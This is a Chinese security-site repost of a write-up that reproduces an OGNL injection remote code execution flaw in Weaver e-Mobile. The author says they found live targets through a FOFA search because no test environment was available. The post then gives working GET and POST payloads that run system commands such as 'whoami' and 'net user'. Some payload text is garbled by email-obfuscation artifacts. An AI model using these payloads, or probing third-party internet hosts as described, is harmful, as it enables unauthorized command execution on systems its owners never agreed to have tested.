泛微e-Mobile ognl注入漏洞复现

admin 2022年5月29日14:24:38安全文章评论33 views1085字阅读3分37秒阅读模式

目标站点

www.xxx.com

漏洞危害

可直接执行系统命令。

漏洞复现

本来想搭建个测试环境,发现互联网上找不到相关环境,那就去FOFA上碰碰运气吧,搜索关键字app="泛微-EMobile"如果哪位师傅有测试环境或者实在搜不到的师傅的都可以在评论区留言。

泛微e-Mobile ognl注入漏洞复现

随意输入账号密码,错误提示104

泛微e-Mobile ognl注入漏洞复现

测试有没有注入

泛微e-Mobile ognl注入漏洞复现

很明显被带入计算了。

直接上poc

GET请求包poc

?message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())

泛微e-Mobile ognl注入漏洞复现

?message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('net user').getInputStream())

泛微e-Mobile ognl注入漏洞复现

POST请求包poc

burp抓取登录处的请求包然后转为POST请求包即可

message=(#_memberAccess=@ognl.[email protected]DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.[email protected]toString(@java.lang.[email protected]getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

泛微e-Mobile ognl注入漏洞复现

message=(#_memberAccess=@ognl.[email protected]DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.[email protected]toString(@java.lang.[email protected]getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=net user

泛微e-Mobile ognl注入漏洞复现


原文始发于微信公众号(赛瑞攻防实验室):泛微e-Mobile ognl注入漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月29日14:24:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  泛微e-Mobile ognl注入漏洞复现 http://cn-sec.com/archives/886881.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: